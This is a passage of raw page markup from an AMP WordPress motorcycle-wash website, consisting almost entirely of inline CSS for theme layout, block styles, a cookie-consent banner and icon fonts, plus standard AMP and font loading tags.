#dfdfdf}:where(amp-accordion>section)>:last-child{margin:0}}amp-accordion>section{float:none!important}amp-accordion>section>*{float:none!important;display:block!important;overflow:hidden!important;position:relative!important}amp-accordion,amp-accordion>section{margin:0}amp-accordion:not(.i-amphtml-built)>section>:last-child{display:none!important}amp-accordion:not(.i-amphtml-built)>section[expanded]>:last-child{display:block!important} /*# sourceURL=/css/ampshared.css*/</style><meta name="amp-to-amp-navigation" content="AMP-Redirect-To; AMP.navigateTo"><link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><link rel="preload" href="https://motorcyclewash.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0" as="font" crossorigin=""><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""><link rel="dns-prefetch" href="https://fonts.gstatic.com"><script async="" src="https://cdn.ampproject.org/v0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-form-0.1.mjs" async="" custom-element="amp-form" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0/amp-form-0.1.js" crossorigin="anonymous" custom-element="amp-form"></script><link crossorigin="anonymous" rel="stylesheet" id="seek-google-fonts-css" href="https://fonts.googleapis.com/css?family=Raleway:400,400i,600,600i,700" type="text/css" media="all"><style amp-custom="">.twp-site-branding .twp-logo,.twp-site-branding .twp-logo a{color:#000}amp-img.amp-wp-enforced-sizes{object-fit:contain}amp-img img,amp-img noscript{image-rendering:inherit;object-fit:inherit;object-position:inherit}:where(.wp-block-button__link){box-shadow:none;text-decoration:none;border-radius:9999px;padding:calc(.667em + 2px) calc(1.333em + 2px)}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}:where(.wp-block-post-comments input[type=submit]){border:none}:where(.wp-block-file__button){border-radius:2em;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}ul{box-sizing:border-box}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}:where(.wp-block-search__button){border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:.125em .5em}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.screen-reader-text:not(#_#_#_#_#_#_#_){word-wrap:normal}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}html :where(.has-border-color){border-style:solid}html :where([data-amp-original-style*=border-top-color]){border-top-style:solid}html :where([data-amp-original-style*=border-right-color]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-color]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-color]){border-left-style:solid}html :where([data-amp-original-style*=border-width]){border-style:solid}html :where([data-amp-original-style*=border-top-width]){border-top-style:solid}html :where([data-amp-original-style*=border-right-width]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-width]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-width]){border-left-style:solid}html :where(amp-img[class*=wp-image-]),html :where(amp-anim[class*=wp-image-]){height:auto;max-width:100%}body{--wp--preset--color--black:#000;--wp--preset--color--cyan-bluish-gray:#abb8c3;--wp--preset--color--white:#fff;--wp--preset--color--pale-pink:#f78da7;--wp--preset--color--vivid-red:#cf2e2e;--wp--preset--color--luminous-vivid-orange:#ff6900;--wp--preset--color--luminous-vivid-amber:#fcb900;--wp--preset--color--light-green-cyan:#7bdcb5;--wp--preset--color--vivid-green-cyan:#00d084;--wp--preset--color--pale-cyan-blue:#8ed1fc;--wp--preset--color--vivid-cyan-blue:#0693e3;--wp--preset--color--vivid-purple:#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple:linear-gradient(135deg,rgba(6,147,227,1) 0%,#9b51e0 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan:linear-gradient(135deg,#7adcb4 0%,#00d082 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange:linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:linear-gradient(135deg,rgba(255,105,0,1) 0%,#cf2e2e 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray:linear-gradient(135deg,#eee 0%,#a9b8c3 100%);--wp--preset--gradient--cool-to-warm-spectrum:linear-gradient(135deg,#4aeadc 0%,#9778d1 20%,#cf2aba 40%,#ee2c82 60%,#fb6962 80%,#fef84c 100%);--wp--preset--gradient--blush-light-purple:linear-gradient(135deg,#ffceec 0%,#9896f0 100%);--wp--preset--gradient--blush-bordeaux:linear-gradient(135deg,#fecda5 0%,#fe2d2d 50%,#6b003e 100%);--wp--preset--gradient--luminous-dusk:linear-gradient(135deg,#ffcb70 0%,#c751c0 50%,#4158d0 100%);--wp--preset--gradient--pale-ocean:linear-gradient(135deg,#fff5cb 0%,#b6e3d4 50%,#33a7b5 100%);--wp--preset--gradient--electric-grass:linear-gradient(135deg,#caf880 0%,#71ce7e 100%);--wp--preset--gradient--midnight:linear-gradient(135deg,#020381 0%,#2874fc 100%);--wp--preset--duotone--dark-grayscale:url("#wp-duotone-dark-grayscale");--wp--preset--duotone--grayscale:url("#wp-duotone-grayscale");--wp--preset--duotone--purple-yellow:url("#wp-duotone-purple-yellow");--wp--preset--duotone--blue-red:url("#wp-duotone-blue-red");--wp--preset--duotone--midnight:url("#wp-duotone-midnight");--wp--preset--duotone--magenta-yellow:url("#wp-duotone-magenta-yellow");--wp--preset--duotone--purple-green:url("#wp-duotone-purple-green");--wp--preset--duotone--blue-orange:url("#wp-duotone-blue-orange");--wp--preset--font-size--small:13px;--wp--preset--font-size--medium:20px;--wp--preset--font-size--large:36px;--wp--preset--font-size--x-large:42px;--wp--preset--spacing--20:.44rem;--wp--preset--spacing--30:.67rem;--wp--preset--spacing--40:1rem;--wp--preset--spacing--50:1.5rem;--wp--preset--spacing--60:2.25rem;--wp--preset--spacing--70:3.38rem;--wp--preset--spacing--80:5.06rem}:where(.is-layout-flex){gap:.5em}:where(.wp-block-columns.is-layout-flex){gap:2em}:where(.wp-block-columns.is-layout-flex){gap:2em}@keyframes spin{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}@keyframes blink{from{opacity:0}50%{opacity:1}to{opacity:0}}#cookie-law-info-bar{font-size:15px;margin:0 auto;padding:12px 10px;position:absolute;text-align:center;box-sizing:border-box;width:100%;z-index:9999;display:none;left:0px;font-weight:300;box-shadow:0 -1px 10px 0 rgba(172,171,171,.3)}#cookie-law-info-again{font-size:10pt;margin:0;padding:5px 10px;text-align:center;z-index:9999;cursor:pointer;box-shadow:#161616 2px 2px 5px 2px}#cookie-law-info-bar span{vertical-align:middle}.cli-plugin-button,.cli-plugin-button:visited{display:inline-block;padding:9px 12px;color:#fff;text-decoration:none;text-decoration:none;position:relative;cursor:pointer;margin-left:5px}.cli-plugin-button:hover{background-color:#111;color:#fff;text-decoration:none}.cli-plugin-button,.cli-plugin-button:visited,.medium.cli-plugin-button,.medium.cli-plugin-button:visited{font-size:13px;font-weight:400;line-height:1}.cli-plugin-button{margin-top:5px}.cli-bar-popup{-moz-background-clip:padding;-webkit-background-clip:padding;background-clip:padding-box;-webkit-border-radius:30px;-moz-border-radius:30px;border-radius:30px;padding:20px}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;display:none}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:900px}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.3rem;outline:0}.cli-modal .cli-modal-close{position:absolute;right:10px;top:10px;z-index:1;padding:0;border:0;-webkit-appearance:none;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff}.cli-modal .cli-modal-close:not(#_#_#_#_#_#_#_){background-color:transparent}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:70px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:24px;width:50px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:20px;left:2px;position:absolute;transition:.4s;width:20px}.cli-switch input:checked + .cli-slider{background-color:#00acad}.cli-switch input:checked + .cli-slider:before{transform:translateX(26px)}.cli-switch .cli-slider{border-radius:34px}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-fade{transition:opacity .15s linear}.cli-tab-content{width:100%;padding:30px}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;-webkit-transform:scale(0);transform:scale(0);transition:opacity ease-in-out .5s}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:99999;transform:scale(0);overflow:hidden;outline:0;display:none}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:inherit;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.2rem;box-sizing:border-box;outline:0}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:38px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:20px;width:38px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:15px;left:3px;position:absolute;transition:.4s;width:15px}.cli-switch input:checked + .cli-slider{background-color:#61a229}.cli-switch input:checked + .cli-slider:before{transform:translateX(18px)}.cli-switch .cli-slider{border-radius:34px;font-size:0}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-tab-content{width:100%;padding:5px 30px 5px 5px;box-sizing:border-box}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}#cookie-law-info-bar .cli-tab-content{background:transparent}#cookie-law-info-bar .cli-nav-link,#cookie-law-info-bar .cli-tab-container p,#cookie-law-info-bar span.cli-necessary-caption,#cookie-law-info-bar .cli-switch .cli-slider:after{color:inherit}#cookie-law-info-bar .cli-tab-header a:before{border-right:1px solid currentColor;border-bottom:1px solid currentColor}#cookie-law-info-bar .cli-row{margin-top:20px}#cookie-law-info-bar .cli-tab-content h4{margin-bottom:.5rem}#cookie-law-info-bar .cli-tab-container{display:none;text-align:left}.cli-tab-footer .cli-btn{background-color:#00acad;padding:10px 15px;text-decoration:none}.cli-tab-footer .wt-cli-privacy-accept-btn{background-color:#61a229;color:#fff;border-radius:0}.cli-tab-footer{width:100%;text-align:right;padding:20px 0}.cli-col-12{width:100%}.cli-tab-header{display:flex;justify-content:space-between}.cli-tab-header a:before{width:10px;height:2px;left:0;top:calc(50% - 1px)}.cli-tab-header a:after{width:2px;height:10px;left:4px;top:calc(50% - 5px);-webkit-transform:none;transform:none}.cli-tab-header a:before{width:7px;height:7px;border-right:1px solid #4a6e78;border-bottom:1px solid #4a6e78;content:" ";transform:rotate(-45deg);-webkit-transition:all .2s ease-in-out;-moz-transition:all .2s ease-in-out;transition:all .2s ease-in-out;margin-right:10px}.cli-tab-header a.cli-nav-link{position:relative;display:flex;align-items:center;font-size:14px;color:#000;text-transform:capitalize}.cli-tab-header{border-radius:5px;padding:12px 15px;cursor:pointer;transition:background-color .2s ease-out .3s,color .2s ease-out 0s;background-color:#f2f2f2}.cli-modal .cli-modal-close{position:absolute;right:0;top:0;z-index:1;-webkit-appearance:none;width:40px;height:40px;padding:0;padding:10px;border-radius:50%;background:transparent;border:none;min-width:40px}.cli-tab-container h4,.cli-tab-container h1{font-family:inherit;font-size:16px;margin-bottom:15px;margin:10px 0}#cliSettingsPopup .cli-tab-section-container{padding-top:12px}.cli-tab-container p,.cli-privacy-content-text{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}.cli-tab-content{display:none}.cli-tab-section .cli-tab-content{padding:10px 20px 5px 20px}.cli-tab-section{margin-top:5px}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:645px}}.cli-switch .cli-slider:after{content:attr(data-cli-disable);position:absolute;right:50px;color:#000;font-size:12px;text-align:right;min-width:80px}.cli-switch input:checked + .cli-slider:after{content:attr(data-cli-enable)}.cli-privacy-overview:not(.cli-collapsed) .cli-privacy-content{max-height:60px;transition:max-height .15s ease-out;overflow:hidden}a.cli-privacy-readmore{font-size:12px;margin-top:12px;display:inline-block;padding-bottom:0;cursor:pointer;color:#000;text-decoration:underline}.cli-modal-footer{position:relative}a.cli-privacy-readmore:before{content:attr(data-readmore-text)}.cli-privacy-content p{margin-bottom:0}.cli-modal-close svg{fill:#000}span.cli-necessary-caption{color:#000;font-size:12px}#cookie-law-info-bar .cli-privacy-overview{display:none}.cli-tab-container .cli-row{max-height:500px;overflow-y:auto}@keyframes blowUpContent{0%{transform:scale(1);opacity:1}99.9%{transform:scale(2);opacity:0}100%{transform:scale(0)}}@keyframes blowUpContentTwo{0%{transform:scale(2);opacity:0}100%{transform:scale(1);opacity:1}}@keyframes blowUpModal{0%{transform:scale(0)}100%{transform:scale(1)}}@keyframes blowUpModalTwo{0%{transform:scale(1);opacity:1}50%{transform:scale(.5);opacity:0}100%{transform:scale(0);opacity:0}}.cli-tab-section .cookielawinfo-row-cat-table td,.cli-tab-section .cookielawinfo-row-cat-table th{font-size:12px}.cli_settings_button{cursor:pointer}.wt-cli-sr-only{display:none;font-size:16px}.cli-bar-container{float:none;margin:0 auto;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;justify-content:space-between;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center}.cli-bar-btn_container{margin-left:20px;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center;flex-wrap:nowrap}.cli-style-v2 a{cursor:pointer}.cli-bar-btn_container a{white-space:nowrap}.cli-style-v2{font-size:11pt;line-height:18px;font-weight:normal}.cli-style-v2 .cli-bar-message{width:70%;text-align:left}.cli-style-v2 .cli-bar-btn_container .cli_action_button,.cli-style-v2 .cli-bar-btn_container .cli_settings_button{margin-left:5px}.cli-style-v2 .cli_settings_button:not(.cli-plugin-button),.cli-style-v2 .cli_action_button:not(.cli-plugin-button){text-decoration:underline}.cli-style-v2 .cli-bar-btn_container .cli-plugin-button{margin-top:5px;margin-bottom:5px}.wt-cli-necessary-checkbox:not(#_#_#_#_#_#_#_){display:none}@media (max-width: 985px){.cli-style-v2 .cli-bar-message{width:100%}.cli-style-v2.cli-bar-container{justify-content:left;flex-wrap:wrap}.cli-style-v2 .cli-bar-btn_container{margin-left:0px;margin-top:10px}}.wt-cli-privacy-overview-actions{padding-bottom:0}@media only screen and (max-width: 479px) and (min-width: 320px){.cli-style-v2 .cli-bar-btn_container{flex-wrap:wrap}}.wt-cli-cookie-description{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}@font-face{font-family:"FontAwesome";src:url("https://motorcyclewash.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot?v=4.7.0");src:url("https://motorcyclewash.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0") format("embedded-opentype"),url("https://motorcyclewash.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0") format("woff2"),url("https://motorcyclewash.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.woff?v=4.7.0") format("woff"),url("https://motorcyclewash.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.ttf?v=4.7.0") format("truetype"),url("https://motorcyclewash.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular") format("svg");font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-search:before{content:""}.fa-home:before{content:""}.fa-clock-o:before{content:""}.fa-chevron-right:before{content:""}.fa-chevron-up:before{content:""}.fa-flash:before{content:""}button::-moz-focus-inner{padding:0;border:0}html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}h1{font-size:2em;margin:.67em 0}a{background-color:transparent}strong{font-weight:bolder}amp-img{border-style:none}button,input{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button{text-transform:none}button,[type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}[type=checkbox],[type=radio]{box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}[hidden]{display:none}body,button,input{color:#404040;font-family:sans-serif;font-size:16px;font-size:1rem;line-height:1.5}h1,h2,h3,h4{clear:both}p{margin-bottom:1.5em}i{font-style:italic}html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}body{background:#fff}ul{margin:0 0 1.5em 3em}ul{list-style:disc}li > ul{margin-bottom:0;margin-left:1.5em}amp-img{height:auto;max-width:100%}table{margin:0 0 1.5em;width:100%}button,input[type=button],input[type=reset],input[type=submit]{border:1px solid;border-color:#ccc #ccc #bbb;border-radius:3px;background:#e6e6e6;color:rgba(0,0,0,.8);font-size:12px;font-size:.75rem;line-height:1;padding:.6em 1em .4em}button:hover,input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover{border-color:#ccc #bbb #aaa}button:active,button:focus,input[type=button]:active,input[type=button]:focus,input[type=reset]:active,input[type=reset]:focus,input[type=submit]:active,input[type=submit]:focus{border-color:#aaa #bbb #bbb}input[type=text],input[type=email],input[type=url],input[type=password],input[type=search],input[type=number],input[type=tel],input[type=range],input[type=date],input[type=month],input[type=week],input[type=time],input[type=datetime],input[type=datetime-local],input[type=color]{color:#666;border:1px solid #ccc;border-radius:3px;padding:3px}input[type=text]:focus,input[type=email]:focus,input[type=url]:focus,input[type=password]:focus,input[type=search]:focus,input[type=number]:focus,input[type=tel]:focus,input[type=range]:focus,input[type=date]:focus,input[type=month]:focus,input[type=week]:focus,input[type=time]:focus,input[type=datetime]:focus,input[type=datetime-local]:focus,input[type=color]:focus{color:#111}a{color:royalblue}a:visited{color:purple}a:hover,a:focus,a:active{color:midnightblue}a:hover,a:focus,a:active{outline:0}a:focus-visible{outline:thin dotted}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;width:1px}.screen-reader-text:not(#_#_#_#_#_#_#_){position:absolute;word-wrap:normal}.screen-reader-text:focus{background-color:#f1f1f1;border-radius:3px;box-shadow:0 0 2px 2px rgba(0,0,0,.6);clip-path:none;color:#21759b;display:block;font-size:14px;font-size:.875rem;font-weight:bold;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}#content[tabindex="-1"]:focus{outline:0}.entry-content:before,.entry-content:after,.site-header:before,.site-header:after,.site-content:before,.site-content:after,.site-footer:before,.site-footer:after{content:"";display:table;table-layout:fixed}.entry-content:after,.site-header:after,.site-content:after,.site-footer:after{clear:both}.entry-content{margin:1.5em 0 0}.custom-logo-link{display:inline-block}@-webkit-keyframes scale-in-center{0%{transform:scale(0);-webkit-transform:scale(0);-moz-transform:scale(0);opacity:1}100%{transform:scale(1);-webkit-transform:scale(1);-moz-transform:scale(1);opacity:1}}@-moz-keyframes scale-in-center{0%{transform:scale(0);-webkit-transform:scale(0);-moz-transform:scale(0);opacity:1}100%{transform:scale(1);-webkit-transform:scale(1);-moz-transform:scale(1);opacity:1}}@keyframes scale-in-center{0%{transform:scale(0);-webkit-transform:scale(0);-moz-transform:scale(0);opacity:1}100%{transform:scale(1);-webkit-transform:scale(1);-moz-transform:scale(1);opacity:1}}@-webkit-keyframes rotate-center{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@-moz-keyframes rotate-center{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@keyframes rotate-center{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@-webkit-keyframes rotate-partial{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(90deg);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg)}}@-moz-keyframes rotate-partial{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(90deg);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg)}}@keyframes rotate-partial{0%{transform:rotate(0);-webkit-transform:rotate(0);-moz-transform:rotate(0)}100%{transform:rotate(90deg);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg)}}@-webkit-keyframes time{100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@-moz-keyframes time{100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}@keyframes time{100%{transform:rotate(360deg);-webkit-transform:rotate(360deg);-moz-transform:rotate(360deg)}}.twp-breadcrumbs ul,.widget ul,.twp-related-post-list,.desktop .twp-nav-menu ul,.twp-mobile-menu ul,.twp-categories-with-bg ul{list-style:none;margin:0;padding:0}.widget .search-form:before,.twp-ticket-pin:before,#content:before,.clearfix:before,.widget .search-form:after,.twp-ticket-pin:after,#content:after,.clearfix:after{clear:both;content:"";display:block}.twp-footer-widget-section .widget .search-form .search-submit,.twp-navigation .twp-nav-menu-section:after,.twp-topbar .twp-title-with-arrow,.twp-close-icon span,.twp-categories-with-bg.twp-categories-with-bg-primary a,.twp-title-with-dashed:before{background-color:#ff0036}.twp-article-post .single-excerpt p{border-color:#ff0036}.twp-single-next-post,.desktop div.twp-nav-menu > ul > li > a,.desktop ul.twp-nav-menu > li > a{transform:perspective(1px) translateZ(0)}.desktop div.twp-nav-menu > ul > li > a,.desktop ul.twp-nav-menu > li > a{position:relative;z-index:1}.desktop div.twp-nav-menu > ul > li > a:before,.desktop ul.twp-nav-menu > li > a:before{position:absolute;display:block;left:0;right:0;top:0;bottom:0;z-index:-1}.twp-float-left{float:left}.clearfix:before,.clearfix:after{clear:both;content:"";display:block}.twp-d-flex{display:flex;flex-wrap:wrap}.d-block{display:block}amp-img{vertical-align:middle;max-width:100%;height:auto}.data-bg{background-size:cover;background-repeat:no-repeat;background-position:center;display:block;background-color:#7b7b7b}.twp-bg-light-gray{background-color:#f8f9fa}.twp-image-hover{overflow:hidden}.twp-image-hover a{transition:transform .3s linear;-webkit-transition:transform .3s linear;-moz-transition:transform .3s linear;backface-visibility:hidden;-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden}.twp-image-hover a:hover{transform:scale(1.1,1.1);-webkit-transform:scale(1.1,1.1);-moz-transform:scale(1.1,1.1)}.container{padding-left:15px;padding-right:15px;width:100%;max-width:100%}@media (min-width: 1350px){.container{margin:0 auto;max-width:1300px}}@media (min-width: 1450px){.container{max-width:1400px}}.twp-row{display:flex;flex-wrap:wrap;margin-left:-7.5px;margin-right:-7.5px}.twp-col-4{padding-left:7.5px;padding-right:7.5px;flex:0 0 100%;max-width:100%}@media (min-width: 768px){.twp-col-4{flex:0 0 50%;max-width:50%}}@media (min-width: 1050px){.twp-col-4{flex:0 0 33.33%;max-width:33.33%}}#content{width:100%;margin:0 auto;max-width:100%}@media (min-width: 1350px){#content{margin:0 auto;max-width:1300px}}@media (min-width: 1450px){#content{max-width:1400px}}#content #primary{padding-left:15px;padding-right:15px}@media (min-width: 992px){#content #primary{float:left;width:60%}}@media (min-width: 1050px){#content #primary{width:70%;padding-right:15px;padding-left:0}}#content #secondary{padding-left:15px;padding-right:15px}@media 